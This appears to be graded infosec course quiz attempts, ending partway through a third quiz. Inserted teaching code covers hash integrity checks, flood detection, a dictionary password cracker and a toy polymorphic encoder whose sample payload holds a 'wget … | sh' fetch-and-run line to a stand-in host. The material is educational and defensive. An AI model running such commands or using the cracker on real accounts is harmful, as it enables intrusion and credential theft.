The senior technology officer is typically the chief ____________________ officer.

Question 1 (Marks: 2)

Information security can begin as a grassroots effort in which systems administrators attempt to improve the security of their systems, which is often referred to as a bottom-up approach. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 2 (Marks: 2)

Confidentiality ensures that only those with the rights and privileges to access information are able to do so. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 3 (Marks: 2)

A(n) project team should consist of a number of individuals who are experienced in one or multiple facets of the technical and nontechnical areas. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 4 (Marks: 2)

Part of the logical design phase of the SecSDLC is planning for partial or catastrophic loss. ____ dictates what steps are taken when an attack occurs. Choose one answer.
a. Continuity planning
b. Incident response
c. Disaster recovery
d. Security response

Correct. Marks for this submission: 2/2.

Question 5 (Marks: 2)

A data custodian works directly with data owners and is responsible for the storage, maintenance, and protection of the information. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 6 (Marks: 2)

A famous study entitled Protection Analysis: Final Report was published in ____. Choose one answer.
a. 1868
b. 1978
c. 1988
d. 1998

Correct. Marks for this submission: 2/2.

Question 7 (Marks: 2)

During the early years, information security was a straightforward process composed predominantly of ____________________ security and simple document classification schemes. Answer: physical

Correct. Marks for this submission: 2/2.

Question 8 (Marks: 2)

In an organization, the value of ____________________ of information is especially high when it involves personal information about employees, customers, or patients. Answer: confidentiality

Correct. Marks for this submission: 2/2.

Question 9 (Marks: 2)

During the ____________________ War, many mainframes were brought online to accomplish more complex and sophisticated tasks, so it became necessary to enable the mainframes to communicate via a less cumbersome process than mailing magnetic tapes between computer centers. Answer: Cold

Correct. Marks for this submission: 2/2.

Question 10 (Marks: 2)

In the ____________________ approach, the project is initiated by upper-level managers who issue policy, procedures and processes, dictate the goals and expected outcomes, and determine accountability for each required action. Answer: top-down

Correct. Marks for this submission: 2/2.

Question 11 (Marks: 2)

A(n) ____________________ is a formal approach to solving a problem by means of a structured sequence of procedures. Answer: methodology

Correct. Marks for this submission: 2/2.

Question 12 (Marks: 2)

The ____ is the individual primarily responsible for the assessment, management, and implementation of information security in the organization. Choose one answer.
a. ISO
b. CIO
c. CISO
d. CTO

Correct. Marks for this submission: 2/2.

Question 13 (Marks: 2)

The senior technology officer is typically the chief ____________________ officer. Answer: information

Correct. Marks for this submission: 2/2.

Question 14 (Marks: 2)

The ____ model consists of six general phases. Choose one answer.
a. pitfall
b. 5SA&D
c. waterfall
d. SysSP

Correct. Marks for this submission: 2/2.

Question 15 (Marks: 2)

The ____________________ phase consists primarily of assessments of the organization, its current systems, and its capability to support the proposed systems. Answer: analysis

Correct. Marks for this submission: 2/2.

Question 16 (Marks: 2)

____ of information is the quality or state of being genuine or original. Choose one answer.
a. Authenticity
b. Spoofing
c. Confidentiality
d. Authorization

Correct. Marks for this submission: 2/2.

Question 17 (Marks: 2)

Information has ____________________ when it is whole, complete, and uncorrupted. Answer: integrity

Correct. Marks for this submission: 2/2.

Question 18 (Marks: 2)

The CNSS model of information security evolved from a concept developed by the computer security industry known as the ____________________ triangle. Answer: C.I.A.

Correct. Marks for this submission: 2/2.

Question 19 (Marks: 2)

Policies are written instructions for accomplishing a specific task. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 20 (Marks: 2)

An information system is the entire set of ____, people, procedures, and networks that make possible the use of information resources in the organization. Choose one answer.
a. software
b. hardware
c. data
d. All of the above

Correct. Marks for this submission: 2/2.

Question 21 (Marks: 2)

People with the primary responsibility for administering the systems that house the information used by the organization perform the ____ role. Choose one answer.
a. security policy developers
b. security professionals
c. system administrators
d. end users

Correct. Marks for this submission: 2/2.

Question 22 (Marks: 2)

A champion is a project manager, who may be a departmental line manager or staff unit manager, and understands project management, personnel management, and information security technical requirements. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 23 (Marks: 2)

A(n) ____ attack is a hacker using a personal computer to break into a system. Choose one answer.
a. indirect
b. direct
c. software
d. hardware

Correct. Marks for this submission: 2/2.

Question 24 (Marks: 2)

____ is the predecessor to the Internet. Choose one answer.
a. NIST
b. ARPANET
c. FIPS
d. DES

Correct. Marks for this submission: 2/2.

Question 25 (Marks: 2)

Hardware is often the most valuable asset possessed by an organization and it is the main target of intentional attacks. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 26 (Marks: 2)

In file hashing, a file is read by a special algorithm that uses the value of the bits in the file to compute a single large number called a ____ value. Choose one answer.
a. key
b. hashing
c. hash
d. code

Correct. Marks for this submission: 2/2.
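The question above describes file hashing only as a definition. The following is an added example (not part of the quiz or its textbook) showing what the hash value is used for in practice: a manifest of file hashes that an integrity check compares against, and the property that flipping a single bit in a file changes its hash entirely. The file contents, names and the SHA-256 choice are constructed assumptions for the example.

```python
import hashlib
import hmac
from typing import Dict, List

# Constructed sample "files" held as bytes in memory so the example runs offline.
SAMPLE_FILES: Dict[str, bytes] = {
    "config.ini": b"[db]\nhost=10.0.0.5\nuser=app\n",
    "install.sh": b"#!/bin/sh\necho installing\n",
}


def hash_bytes(data: bytes, algorithm: str = "sha256") -> str:
    """Read the bytes through a hash algorithm and return the single
    fixed-size value (as hex) that the quiz calls the hash value."""
    h = hashlib.new(algorithm)
    # Feed the data in chunks, as a real file reader would, not all at once.
    for i in range(0, len(data), 4096):
        h.update(data[i:i + 4096])
    return h.hexdigest()


def build_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Record the hash of every file. Keep this record where an attacker
    cannot rewrite it (signed, or on read-only media), or it proves nothing."""
    return {name: hash_bytes(content) for name, content in files.items()}


def verify_manifest(files: Dict[str, bytes], manifest: Dict[str, str]) -> List[str]:
    """Return findings for files whose current hash differs from the manifest,
    files that are missing, and files the manifest never listed.
    compare_digest avoids leaking how many leading bytes matched."""
    findings = []
    for name, expected in manifest.items():
        if name not in files:
            findings.append(f"{name}: missing")
            continue
        actual = hash_bytes(files[name])
        if not hmac.compare_digest(actual, expected):
            findings.append(f"{name}: modified")
    for name in files:
        if name not in manifest:
            findings.append(f"{name}: not in manifest")
    return findings


def flip_one_bit(data: bytes, bit_index: int = 0) -> bytes:
    """Change a single bit of the input; the resulting hash bears no
    resemblance to the original (the avalanche property)."""
    b = bytearray(data)
    b[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(b)


if __name__ == "__main__":
    manifest = build_manifest(SAMPLE_FILES)
    print("clean:", verify_manifest(SAMPLE_FILES, manifest))
    tampered = dict(SAMPLE_FILES)
    tampered["install.sh"] = flip_one_bit(SAMPLE_FILES["install.sh"])
    print("tampered:", verify_manifest(tampered, manifest))
    print(hash_bytes(SAMPLE_FILES["install.sh"]))
    print(hash_bytes(tampered["install.sh"]))
```

The check catches modification, deletion and unexpected additions, but only relative to the stored manifest: an attacker who can rewrite both the file and its recorded hash defeats it, which is why real deployments sign the manifest or keep it off the host.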

Question 27 (Marks: 2)

Applications systems developed within the framework of the traditional SDLC are designed to anticipate a software attack that requires some degree of application reconstruction. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 28 (Marks: 2)

A(n) ____________________ is a group of individuals who are united by similar interests or values within an organization and who share a common goal of helping the organization to meet its objectives. Answer: community of interest

Correct. Marks for this submission: 2/2.

Question 29 (Marks: 2)

The ____ is a methodology for the design and implementation of an information system in an organization. Choose one answer.
a. DSLC
b. SDLC
c. LCSD
d. CLSD

Correct. Marks for this submission: 2/2.

Question 30 (Marks: 2)

Hardware is the physical technology that houses and executes the software, stores and transports the data, and provides interfaces for the entry and removal of information from the system. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 31 (Marks: 2)

A frequently overlooked component of an IS, ____________________ are written instructions for accomplishing a specific task. Answer: procedures

Correct. Marks for this submission: 2/2.

Question 32 (Marks: 2)

Organizations are moving toward more ____-focused development approaches, seeking to improve not only the functionality of the systems they have in place, but consumer confidence in their product. Choose one answer.
a. security
b. reliability
c. accessibility
d. availability

Correct. Marks for this submission: 2/2.

Question 33 (Marks: 2)

Information security can be an absolute. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 34 (Marks: 2)

A breach of possession always results in a breach of confidentiality. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 35 (Marks: 2)

The Internet brought connectivity to virtually all computers that could reach a phone line or an Internet-connected local area ____________________. Answer: network

Correct. Marks for this submission: 2/2.

Question 36 (Marks: 2)

An e-mail virus involves sending an e-mail message with a modified field. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 37 (Marks: 2)

In information security, salami theft occurs when an employee steals a few pieces of information at a time, knowing that taking more would be noticed, but eventually the employee gets something complete or usable. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 38 (Marks: 2)

Information has redundancy when it is free from mistakes or errors and it has the value that the end user expects. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 39 (Marks: 2)

Which of the following is a valid type of data ownership? Choose one answer.
a. Data owners
b. Data custodians
c. Data users
d. All of the above

Correct. Marks for this submission: 2/2.

Question 40 (Marks: 2)

Which of the following phases is the longest and most expensive phase of the systems development life cycle? Choose one answer.
a. investigation
b. logical design
c. implementation
d. maintenance and change

Correct. Marks for this submission: 2/2.

Question 41 (Marks: 2)

The most successful kind of top-down approach involves a formal development strategy referred to as a ____. Choose one answer.
a. systems design
b. development life project
c. systems development life cycle
d. systems schema

Correct. Marks for this submission: 2/2.

Question 42 (Marks: 2)

Direct attacks originate from a compromised system or resource that is malfunctioning or working under the control of a threat. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 43 (Marks: 2)

In general, protection is the quality or state of being secure: to be free from danger. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 44 (Marks: 2)

A computer is the ____________________ of an attack when it is the target entity. Answer: object

Correct. Marks for this submission: 2/2.

Question 45 (Marks: 2)

A computer is the ____ of an attack when it is used to conduct the attack. Choose one answer.
a. subject
b. object
c. target
d. facilitator

Correct. Marks for this submission: 2/2.

Question 46 (Marks: 2)

During the ____ phase, specific technologies are selected to support the alternatives identified and evaluated in the logical design. Choose one answer.
a. investigation
b. implementation
c. analysis
d. physical design

Correct. Marks for this submission: 2/2.

Question 47 (Marks: 2)

The ____________________ component of the IS comprises applications, operating systems, and assorted command utilities. Answer: software

Correct. Marks for this submission: 2/2.

Question 48 (Marks: 2)

The ____________________ of information is the quality or state of ownership or control of some object or item. Answer: possession

Correct. Marks for this submission: 2/2.

Question 49 (Marks: 2)

A(n) ____________________ information security policy outlines the implementation of a security program within the organization. Answer: enterprise information security policy

Incorrect. Correct answer: enterprise. Marks for this submission: 0/2.

Question 50 (Marks: 2)

The history of information security begins with the history of ____________________ security. Answer: computer

Correct. Marks for this submission: 2/2.

Question 1 (Marks: 2)

Attempting to reverse-calculate a password is called ____________________. Answer: cracking

Correct. Marks for this submission: 2/2.

Question 2 (Marks: 2)

In the well-known ____ attack, an attacker monitors (or sniffs) packets from the network, modifies them, and inserts them back into the network. Choose one answer.
a. zombie-in-the-middle
b. sniff-in-the-middle
c. server-in-the-middle
d. man-in-the-middle

Correct. Marks for this submission: 2/2.

Question 3 (Marks: 2)

A ____ is an attack in which a coordinated stream of requests is launched against a target from many locations at the same time. Choose one answer.
a. denial-of-service
b. distributed denial-of-service
c. virus
d. spam

Correct. Marks for this submission: 2/2.

Question 4 (Marks: 2)

In a ____ attack, the attacker sends a large number of connection or information requests to a target. Choose one answer.
a. denial-of-service
b. distributed denial-of-service
c. virus
d. spam

Correct. Marks for this submission: 2/2.
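Questions 3 and 4 distinguish a DoS flood (many requests from one source) from a DDoS flood (a coordinated stream from many sources). As an added example, not from the quiz or its textbook, the detector below makes that distinction from web-server access-log lines: it buckets requests into fixed time windows and, for any window over a request threshold, reports "dos" when one source dominates and "ddos" when the volume is spread across many sources. The log format, the IP addresses (all from documentation ranges) and the thresholds are constructed assumptions.

```python
from collections import Counter
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

EPOCH = datetime(1970, 1, 1)


def build_sample_log() -> List[str]:
    """Constructed access-log lines in the form '<ISO time> <client ip> <request>'."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    # Normal traffic: four clients, one request per second for 20 seconds.
    for i in range(20):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} 192.0.2.{i % 4 + 1} GET /index.html")
    # DoS: a single source sends 300 requests within two seconds.
    for i in range(300):
        t = base + timedelta(seconds=60, milliseconds=i * 6)
        lines.append(f"{t.isoformat()} 203.0.113.7 GET /login")
    # DDoS: 150 distinct sources send two requests each within two seconds.
    for i in range(150):
        for j in range(2):
            t = base + timedelta(seconds=120, milliseconds=i * 10 + j)
            lines.append(f"{t.isoformat()} 198.51.100.{i + 1} GET /search")
    return lines


def parse_line(line: str) -> Tuple[datetime, str]:
    """Extract timestamp and client IP; the request text is not needed here."""
    ts, ip, _request = line.split(" ", 2)
    return datetime.fromisoformat(ts), ip


def detect_floods(lines: List[str], window_seconds: int = 10,
                  total_threshold: int = 100, single_source_share: float = 0.8,
                  min_sources: int = 50) -> List[Tuple[str, datetime, str]]:
    """Return (kind, window_start, detail) alerts for flooded windows."""
    buckets: Dict[int, Counter] = {}
    for line in lines:
        ts, ip = parse_line(line)
        key = int((ts - EPOCH).total_seconds()) // window_seconds
        buckets.setdefault(key, Counter())[ip] += 1

    alerts = []
    for key in sorted(buckets):
        counts = buckets[key]
        total = sum(counts.values())
        if total < total_threshold:
            continue  # ordinary load; no alert
        start = EPOCH + timedelta(seconds=key * window_seconds)
        top_ip, top_n = counts.most_common(1)[0]
        if top_n / total >= single_source_share:
            # One source accounts for nearly all requests: a plain DoS flood.
            alerts.append(("dos", start, f"{top_ip} sent {top_n}/{total}"))
        elif len(counts) >= min_sources:
            # Volume spread over many sources: coordinated, i.e. distributed.
            alerts.append(("ddos", start, f"{len(counts)} sources sent {total}"))
    return alerts


if __name__ == "__main__":
    for kind, start, detail in detect_floods(build_sample_log()):
        print(kind, start.isoformat(), detail)
```

The practical consequence of the split is in the response: a dominant single source can be dropped at the edge by address, while a DDoS window yields no single address worth blocking and has to be handled by rate limiting, upstream scrubbing or capacity instead.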

Question 5 (Marks: 2)

Intellectual property is defined as the ownership of ideas and control over the tangible or virtual representation of those ideas. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 6 (Marks: 2)

Complete loss of power for a moment is known as a ____. Choose one answer.
a. sag
b. fault
c. brownout
d. blackout

Incorrect. Marks for this submission: 0/2.

Question 7 (Marks: 2)

Microsoft acknowledged that if you type a res:// URL (a Microsoft-devised type of URL) which is longer than ____ characters in Internet Explorer 4.0, the browser will crash. Choose one answer.
a. 64
b. 128
c. 256
d. 512

Correct. Marks for this submission: 2/2.

Question 8 (Marks: 2)

Duplication of software-based intellectual property is more commonly known as software ____________________. Answer: piracy

Correct. Marks for this submission: 2/2.

Question 9 (Marks: 2)

A(n) ____________________ is an object, person, or other entity that represents an ongoing danger to an asset. Answer: threat

Correct. Marks for this submission: 2/2.

Question 10 (Marks: 2)

The ____ data file contains the hashed representation of the user's password. Choose one answer.
a. SLA
b. SNMP
c. FBI
d. SAM

Correct. Marks for this submission: 2/2.
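Question 1 of this section calls password cracking "reverse-calculating" a password, and Question 10 notes that the SAM file stores only a hashed representation. The hash itself is one-way, so cracking actually means guessing candidates and hashing each until one matches. The added example below (not from the quiz or its textbook) shows that against a constructed account store, and why it matters whether the store is salted: without a salt, one table of guess hashes cracks every account at once and identical passwords are visible as identical hashes; with a per-account salt every guess has to be hashed again per account. The hash functions are assumptions for the example: SHA-256 over UTF-16LE stands in for the SAM's real NTLM hash so the code runs anywhere, and PBKDF2 represents a salted, iterated store.

```python
import hashlib
import os
from typing import Dict, Iterable, Iterator, Tuple


def unsalted_hash(password: str) -> str:
    """Stand-in for the unsalted one-way hash a SAM-style store keeps.
    Assumption: SHA-256 instead of NTLM's MD4; the property that matters,
    the absence of a salt, is the same."""
    return hashlib.sha256(password.encode("utf-16-le")).hexdigest()


def salted_hash(password: str, salt: bytes, iterations: int = 5_000) -> str:
    """A salted, iterated hash as a password store should use."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def candidates(wordlist: Iterable[str]) -> Iterator[str]:
    """Guesses: each wordlist entry plus a few common mangling rules."""
    for w in wordlist:
        yield w
        yield w.capitalize()
        yield w + "1"
        yield w + "!"
        yield w.capitalize() + "123"


def crack_unsalted(store: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Hash every guess once, then look up every account in that table.
    Work is proportional to guesses, not to guesses times accounts."""
    table = {unsalted_hash(g): g for g in candidates(wordlist)}
    return {user: table[h] for user, h in store.items() if h in table}


def crack_salted(store: Dict[str, Tuple[bytes, str]], wordlist: Iterable[str]) -> Dict[str, str]:
    """With a per-account salt the table cannot be shared: each guess is
    re-hashed for each account, multiplying the attacker's work."""
    found = {}
    for user, (salt, h) in store.items():
        for g in candidates(wordlist):
            if salted_hash(g, salt) == h:
                found[user] = g
                break
    return found


def make_salted_store(passwords: Dict[str, str]) -> Dict[str, Tuple[bytes, str]]:
    """Build a store with a fresh random salt per account."""
    store = {}
    for user, pw in passwords.items():
        salt = os.urandom(16)
        store[user] = (salt, salted_hash(pw, salt))
    return store


# Constructed wordlist and accounts; not real credentials.
WORDLIST = ["password", "letmein", "winter", "dragon"]
PASSWORDS = {
    "alice": "Winter123",
    "bob": "Winter123",       # same password as alice
    "carol": "xK9#vQ2!zL",    # not derivable from the wordlist; stays uncracked
}
UNSALTED_STORE = {user: unsalted_hash(pw) for user, pw in PASSWORDS.items()}
SALTED_STORE = make_salted_store(PASSWORDS)

if __name__ == "__main__":
    print("alice and bob share a hash:", UNSALTED_STORE["alice"] == UNSALTED_STORE["bob"])
    print("unsalted:", crack_unsalted(UNSALTED_STORE, WORDLIST))
    print("salted:", crack_salted(SALTED_STORE, WORDLIST))
```

Both cracks succeed for alice and bob because their password is a wordlist entry with a common suffix; the salt does not stop that, it only removes the shared-table shortcut and the reuse leak, so the iteration count and the quality of the password still decide the outcome.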

Question 11 (Marks: 2)

Web hosting services are usually arranged with an agreement providing minimum service levels known as a(n) ____. Choose one answer.
a. SSL
b. SLA
c. MSL
d. MIN

Correct. Marks for this submission: 2/2.

Question 12 (Marks: 2)

____ are software programs that hide their true nature, and reveal their designed behavior only when activated. Choose one answer.
a. Viruses
b. Worms
c. Spam
d. Trojan horses

Correct. Marks for this submission: 2/2.

Question 13 (Marks: 2)

In the context of information security, ____________________ is the process of using social skills to convince people to reveal access credentials or other valuable information to the attacker. Answer: social engineering

Correct. Marks for this submission: 2/2.

Question 14 (Marks: 2)

A firewall is a mechanism that keeps certain kinds of network traffic out of a private network. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 15 (Marks: 2)

A(n) ____________________ is a malicious program that replicates itself constantly, without requiring another program environment. Answer: worm

Correct. Marks for this submission: 2/2.

Question 16 (Marks: 2)

ESD means electrostatic ____________________. Answer: discharge

Correct. Marks for this submission: 2/2.

Question 17 (Marks: 2)

A number of technical mechanisms (digital watermarks and embedded code, copyright codes, and even the intentional placement of bad sectors on software media) have been used to enforce copyright laws. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 18 (Marks: 2)

Compared to Web site defacement, vandalism within a network is less malicious in intent and more public. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 19 (Marks: 2)

As frustrating as viruses and worms are, perhaps more time and money is spent on resolving virus ____. Choose one answer.
a. false alarms
b. power faults
c. hoaxes
d. urban legends

Correct. Marks for this submission: 2/2.

Question 20 (Marks: 2)

A(n) cookie can allow an attacker to collect information on how to access password-protected sites. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 21 (Marks: 2)

One form of online vandalism is ____ operations, which interfere with or disrupt systems to protest the operations, policies, or actions of an organization or government agency. Choose one answer.
a. hacktivist
b. phvist
c. hackcyber
d. cyberhack

Correct. Marks for this submission: 2/2.

Question 22 (Marks: 2)

An act of theft performed by a hacker falls into the category of theft, but is also often accompanied by defacement actions to delay discovery and thus may also be placed within the category of forces of nature. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 23 (Marks: 2)

Acts of ____ can lead to unauthorized real or virtual actions that enable information gatherers to enter premises or systems they have not been authorized to enter. Choose one answer.
a. bypass
b. nature
c. trespass
d. security

Correct. Marks for this submission: 2/2.

Question 24 (Marks: 2)

A computer virus consists of segments of code that perform ____________________ actions. Answer: malicious

Correct. Marks for this submission: 2/2.

Question 25 (Marks: 2)

A momentary low voltage is called a(n) ____________________. Answer: sag

Correct. Marks for this submission: 2/2.

Question 26 (Marks: 2)

A mail bomb is a form of DoS. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 27 (Marks: 2)

Which of the following functions does information security perform for an organization? Choose one answer.
a. Protecting the organization's ability to function.
b. Enabling the safe operation of applications implemented on the organization's IT systems.
c. Protecting the data the organization collects and uses.
d. All of the above.

Correct. Marks for this submission: 2/2.

Question 28 (Marks: 2)

Some information gathering techniques are quite legal, for example, using a Web browser to perform market research. These legal techniques are called, collectively, competitive ____________________. Answer: itelligence

Incorrect. Correct answer: intelligence. Marks for this submission: 0/2.

Question 29 (Marks: 2)

A worm requires that another program is running before it can begin functioning. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 30 (Marks: 2)

Which of the following is an example of a Trojan horse program? Choose one answer.
a. Netsky
b. MyDoom
c. Klez
d. Happy99.exe

Correct. Marks for this submission: 2/2.

Question 31 (Marks: 2)

Cyberterrorists hack systems to conduct terrorist activities via network or Internet pathways. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 32 (Marks: 2)

A(n) ____________________ is an application error that occurs when more data is sent to a program buffer than it is designed to handle. Answer: buffer overrun

Correct. Marks for this submission: 2/2.

Question 33 (Marks: 2)

A virus or worm can have a payload that installs a(n) ____________________ door or trap door component in a system, which allows the attacker to access the system at will with special privileges. Answer: back

Correct. Marks for this submission: 2/2.

Question 34 (Marks: 2)

____ are machines that are directed remotely (usually by a transmitted command) by the attacker to participate in an attack. Choose one answer.
a. Drones
b. Helpers
c. Zombies
d. Servants

Correct. Marks for this submission: 2/2.

Question 35 (Marks: 2)

Script ____________________ are hackers of limited skill who use expertly written software to attack a system. Answer: kiddies

Correct. Marks for this submission: 2/2.

Question 36 (Marks: 2)

The expert hacker sometimes is called a(n) ____________________ hacker. Answer: elite

Correct. Marks for this submission: 2/2.

Question 37 (Marks: 2)

A(n) ____________________ hacks the public telephone network to make free calls or disrupt services. Answer: phreaker

Correct. Marks for this submission: 2/2.

Question 38 (Marks: 2)

DoS attacks cannot be launched against routers. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 39 (Marks: 2)

There are generally two skill levels among hackers: expert and ____. Choose one answer.
a. novice
b. journeyman
c. packet monkey
d. professional

Correct. Marks for this submission: 2/2.

Question 40 (Marks: 2)

The ____ hijacking attack uses IP spoofing to enable an attacker to impersonate another entity on the network. Choose one answer.
a. WWW
b. TCP
c. FTP
d. HTTP

Correct. Marks for this submission: 2/2.

Question 41 (Marks: 2)

Hackers are people who use and create computer software to gain access to information illegally. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 42 (Marks: 2)

A(n) polymorphic threat is one that over time changes the way it appears to antivirus software programs, making it undetectable by techniques that look for preconfigured signatures. Answer: True / False

Correct. Marks for this submission: 2/2.
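Question 42 states that a polymorphic threat defeats signature matching by changing its appearance. As an added example, not from the quiz or its textbook, the code below builds a toy model of both sides: a static scanner that looks for a fixed byte signature, a generator that produces a fresh-looking copy of the same payload by XOR-encoding it under a new key behind a small decoder header, and the countermeasure real engines use, which is to recognise the decoder, run it (here: undo the XOR) and scan the decoded body. The payload bytes, the signature and the four-byte decoder marker are constructed assumptions; a real decoder stub is executable code that an engine emulates rather than a data header.

```python
import os
from typing import List, Optional

# Constructed stand-in for a malicious code body; the scanner's signature is a
# distinctive substring of it. The URL is a reserved example name, not real.
PAYLOAD = b"\x90\x90CMD:/bin/sh -c 'wget http://example.invalid/x | sh'\x90\x90"
SIGNATURE = b"wget http://example.invalid/x"

# Toy decoder stub: a marker, then the one-byte key, then the encoded body.
MAGIC = b"POLY"


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def make_polymorphic_variant(payload: bytes, key: Optional[int] = None) -> bytes:
    """Each copy picks a fresh nonzero key, so the encoded body differs every
    time even though the decoded behaviour is identical."""
    if key is None:
        key = os.urandom(1)[0] or 1
    return MAGIC + bytes([key]) + xor_encode(payload, key)


def signature_scan(sample: bytes, signatures: List[bytes]) -> bool:
    """Static scan: matches only the preconfigured byte patterns."""
    return any(sig in sample for sig in signatures)


def emulate_then_scan(sample: bytes, signatures: List[bytes]) -> bool:
    """Recognise the decoder stub, run it, then scan what it produces.
    Falls back to a plain static scan when no stub is present."""
    if sample.startswith(MAGIC) and len(sample) > len(MAGIC) + 1:
        key = sample[len(MAGIC)]
        decoded = xor_encode(sample[len(MAGIC) + 1:], key)
        return signature_scan(decoded, signatures)
    return signature_scan(sample, signatures)


if __name__ == "__main__":
    v1 = make_polymorphic_variant(PAYLOAD)
    v2 = make_polymorphic_variant(PAYLOAD)
    print("plain payload, static scan:   ", signature_scan(PAYLOAD, [SIGNATURE]))
    print("variant, static scan:         ", signature_scan(v1, [SIGNATURE]))
    print("variant, emulate then scan:   ", emulate_then_scan(v1, [SIGNATURE]))
    print("two variants look different:  ", v1 != v2)
```

The static scanner can still catch the variant if its signature targets the part that does not change, the decoder stub itself (here the `POLY` marker); real polymorphic engines therefore also mutate the decoder, which is what pushes detection toward emulation and behavioural analysis.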

Question 43 (Marks: 2)

Attacks conducted by scripts are usually unpredictable. Answer: True / False

Incorrect. Marks for this submission: 0/2.

Question 44 (Marks: 2)

According to Mark Pollitt, ____ is the premeditated, politically motivated attacks against information, computer systems, computer programs, and data which result in violence against noncombatant targets by subnational groups or clandestine agents. Choose one answer.
a. infoterrorism
b. cyberterrorism
c. hacking
d. cracking

Correct. Marks for this submission: 2/2.

Question 45 (Marks: 2)

A(n) ____________________ is an identified weakness in a controlled system, where controls are not present or are no longer effective. Answer: vulnerability

Correct. Marks for this submission: 2/2.

Question 46 (Marks: 2)

A timing attack involves the interception of cryptographic elements to determine keys and encryption algorithms. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 47 (Marks: 2)

A worm can deposit copies of itself onto all Web servers that the infected system can reach, so that users who subsequently visit those sites become infected. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 48 (Marks: 2)

The timing attack explores the contents of a Web browser's ____________________. Answer: cache

Correct. Marks for this submission: 2/2.

Question 49 (Marks: 2)

A sniffer program shows all the data going by on a network segment, including passwords, the data inside files (such as word-processing documents), and screens full of sensitive data from applications. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 50 (Marks: 2)

A(n) ____________________ is an act that takes advantage of a vulnerability to compromise a controlled system. Answer: attack

Correct. Marks for this submission: 2/2.

Question 1 (Marks: 2)

The ____________________ is a respected professional society that was established in 1947 as the world's first educational and scientific computing society. Answer: Association of Computing Machinery

Correct. Marks for this submission: 2/2.

Question 2 (Marks: 2)

Laws and policies and their associated penalties only deter if which of the following conditions is present? Choose one answer.
a. Fear of penalty
b. Probability of being caught
c. Probability of penalty being administered
d. All of the above

Correct. Marks for this submission: 2/2.

Question 3 (Marks: 2)

Cultural differences can make it easy to determine what is and is not ethical, especially when it comes to the use of computers. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 4 (Marks: 2)

The ____________________ Act of 2001 provides law enforcement agencies with broader latitude in order to combat terrorism-related activities. Answer: USA PATRIOT

Correct. Marks for this submission: 2/2.

Question 5 (Marks: 2)

Which of the following countries reported generally intolerant attitudes toward personal use of organizational computing resources? Choose one answer.
a. Australia
b. United States
c. Singapore
d. Sweden

Correct. Marks for this submission: 2/2.

Question 6 (Marks: 2)

____ attempts to prevent trade secrets from being illegally shared. Choose one answer.
a. Electronic Communications Privacy Act
b. Sarbanes-Oxley Act
c. Financial Services Modernization Act
d. Economic Espionage Act

Correct. Marks for this submission: 2/2.

Question 7 (Marks: 2)

The Privacy of Customer Information Section of the common carrier regulation states that any proprietary information shall be used explicitly for providing services, and not for any ____ purposes. Choose one answer.
a. troubleshooting
b. billing
c. customer service
d. marketing

Correct. Marks for this submission: 2/2.

Question 8 (Marks: 2)

Established in January 2001, the National InfraGard Program began as a cooperative effort between the FBI's Cleveland Field Office and local technology professionals. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 9 (Marks: 2)

The ____ Portability and Accountability Act of 1996, also known as the Kennedy-Kassebaum Act, protects the confidentiality and security of health care data by establishing and enforcing standards and by standardizing electronic data interchange. Choose one answer.
a. Customer
b. Health Insurance
c. Computer
d. Telecommunications

Correct. Marks for this submission: 2/2.

Question 10 (Marks: 2)

Studies have reported that the Pacific Rim countries of Singapore and Hong Kong are hotbeds of software piracy. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 11 (Marks: 2)

____________________ are the fixed moral attitudes or customs of a particular group. Answer: Cultural mores

Correct. Marks for this submission: 2/2.

Question 12 (Marks: 2)

Every state has implemented uniform laws and regulations placed on organizational use of computer technology. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 13 (Marks: 2)

HIPAA specifies particular security technologies for each of the security requirements to ensure the privacy of the health-care information. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 14 (Marks: 2)

The ____________________ Association is a professional association that focuses on auditing, control, and security and whose membership comprises both technical and managerial professionals. Answer: Information Systems Audit and Control

Correct. Marks for this submission: 2/2.

Question 15 (Marks: 2)

The ____________________ Act of 1996 attempts to prevent trade secrets from being illegally shared. Answer: Economic Espionage

Correct. Marks for this submission: 2/2.

Question 16 (Marks: 2)

The ____________________ Act of 1986 is a collection of statutes that regulates the interception of wire, electronic, and oral communications. Answer: Electronic Communications Privacy

Correct. Marks for this submission: 2/2.

Question 17 (Marks: 2)

